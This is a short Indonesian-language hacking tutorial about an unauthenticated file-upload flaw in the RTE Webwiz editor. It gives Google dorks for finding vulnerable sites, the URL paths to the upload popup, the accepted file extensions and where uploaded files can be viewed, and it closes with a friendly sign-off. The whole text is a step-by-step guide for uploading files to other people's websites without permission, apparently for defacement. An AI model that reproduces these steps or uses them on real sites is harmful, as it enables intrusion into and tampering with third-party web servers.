RTE Webwiz Upload Vulnerability

dork :
     inurl:"/my_documents/my_files/"
     inurl:"RTE_popup_file_atch.asp"

lanjut caranya :

1. masukan dork di atas ke om google

2. buka salah satu target lalu ganti urlnya (khusus dork yg pertama, kalo make yg kedua tinggal upload) menjadi :

target.com/RTE_popup_file_atch.asp
atau
target.com/rte/RTE_popup_file_atch.asp
atau
target.com/admin/RTE_popup_file_atch.asp

3. maka akan nampak seperti ini :

4. upload file dengan ext :  zip, rar, doc, pdf, txt, rtf, htm, html, gif, jpg, png,

5. liat hasilnya di :

target.com/my_documents/my_files/filemu

atau liat aja di sebelah kanan, ada alamat url ama previewnya 


semoga bermanfaat, terima kasih ^_^